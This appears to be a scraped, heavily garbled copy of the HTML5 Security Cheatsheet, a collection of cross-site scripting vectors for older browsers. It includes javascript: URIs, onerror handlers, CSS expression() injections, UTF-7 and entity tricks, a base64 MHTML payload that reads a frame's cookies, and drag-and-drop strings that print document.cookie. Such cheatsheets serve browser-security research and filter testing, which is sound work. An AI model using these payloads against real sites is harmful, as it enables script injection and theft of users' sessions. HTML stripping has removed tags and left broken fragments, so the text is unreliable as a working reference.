// Source: http://html5sec.org/ (HTML5 Security Cheatsheet)


CLICKME


CLICKME


CLICKMEhttp://http://google.com

CLICK // window.opener will be null

CLICK

// window.opener will be null in the opened window, so that page cannot reach back to this one

CLICK // window.opener still works

// window.opener still works: the opened window keeps a reference to this page and can navigate it

// window.opener still works

CLICKME// window.opener still works

<iframe srcdoc="

<a href="javascript:&apos;CLICK

<!–
<img src="



<img src="

  • XXX
    alert(1)

    <b alert(1)//0

    document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;



    // Opera 10.10 and below, Opera Mobile 10.0 and below, Chrome 6 and below, Firefox

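    // Internet Explorer 6, Opera 10.10 and below, Opera Mobile 10.0 and below
    // Internet Explorer 6, Opera 11.01 and below, Opera Mobile 10.1 and below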

    x

    class XSS {public static function main() {

    flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”);

    }}

    [A]
    alert(1)”>
    alert(1)”>
    alert(1)”>
    [B]
    alert(1)’>”>
    [C]
    alert(1)”>
    [D]
    alert(1)”>

    some content that does not contain two consecutive newlines (\n\n)
    Content-Type: multipart/related; boundary=”******”some content without two new line
    –******
    Content-Location: xss.html
    Content-Transfer-Encoding: base64

    PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1
    cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9
    dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy
    YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg
    –******–

    d.innerHTML+=”;

    d.innerHTML+=”;

    <img src="x` `alert(1)”` `>



    “>





    <!–[if –>
    // Safari 5.0, Chrome 9, 10
    // Safari 5.0

    <!– `

    <%

    x='<%'
    %>/
    alert(2)

    XXX

    *[‘<!–']{}

    –>{}
    *{color:red}

    X
    p[foo=bar{}*{-o-link:’javascript:alert(1)’}{}*{-o-link-source:current}*{background:red}]{background:green};
    <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
    @import “data:,*%7bx:expression(write(1))%7D”;
    XXXYXXXZ
    *[{}@import’test.css?]{color: green;}X
    {-o-link:’javascript:alert(1)’;-o-link-source: current;}

    XXX
    XXX
    XXX

    *{x:expression(write(1))}

    PRESS ENTER

    X
    X
    X

    with(document.getElementById(“d”))innerHTML=innerHTML

    XXX

    *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */

    <!–*{color:red} /* all UA */

    *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */

    X
    X
    XXX

    #x{font-family:foo[bar;color:green;}

    #y];color:red;{}

    XXX

    ({set/**/$($){_/**/setter=$,_=1}}).$=alert
    ({0:#0=alert/#0#/#0#(0)})
    ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(1)}),x
    Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()
    history.pushState(0,0,’/i/am/somewhere_else’);

    alert`1`;
    var something = `abc${alert(1)}def`;
    “.constructor.constructor`alert\`1\““;

    {alert(1)};1
    +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
    <script<alert(1)</script
    <script</script
    0?Worker(“#”).onmessage=function(_)eval(_.data) :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))
    crypto.generateCRMFRequest(‘CN=0′,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)
    [{‘a’:Object.prototype.__defineSetter__(‘b’,function(){alert(arguments[0])}),’b’:[‘secret’]}]

    @font-face {font-family: y; src: url(“font.svg#x”) format(“svg”);} body {font: 100px “y”;}

    Hello

    alert(1)

    alert(1)

    <!DOCTYPE doc [
    ]>

    alert(1)

    <img/src=x onerror=alert(1)//

    <image style='filter:url("data:image/svg+xml,parent.alert(1)”)’>
    <!–
    Same effect with

    –>


    alert&DiacriticalGrave;1&DiacriticalGrave;

    alert&grave;1&grave;

    alert(1)
    <!DOCTYPE x[]>&x;
    alert(1)

    <!DOCTYPE x [

    ]>

    XXX

    ¼script ¾alert(1)//¼/script ¾

    Drag and drop one of the following strings onto the drop box:


    jAvascript:alert(‘Top Page Location: ‘+document.location+’ Host Page Cookies: ‘+document.cookie);//


    feed:javascript:alert(‘Top Page Location: ‘+document.location+’ Host Page Cookies: ‘+document.cookie);//


    feed:data:text/html,<script>alert(‘Top Page Location: ‘+document.location+’ Host Page Cookies: ‘+document.cookie)</script><b>


    feed:feed:javAscript:javAscript:feed:alert(‘Top Page Location: ‘+document.location+’ Host Page Cookies: ‘+document.cookie);//


    + Drop Box +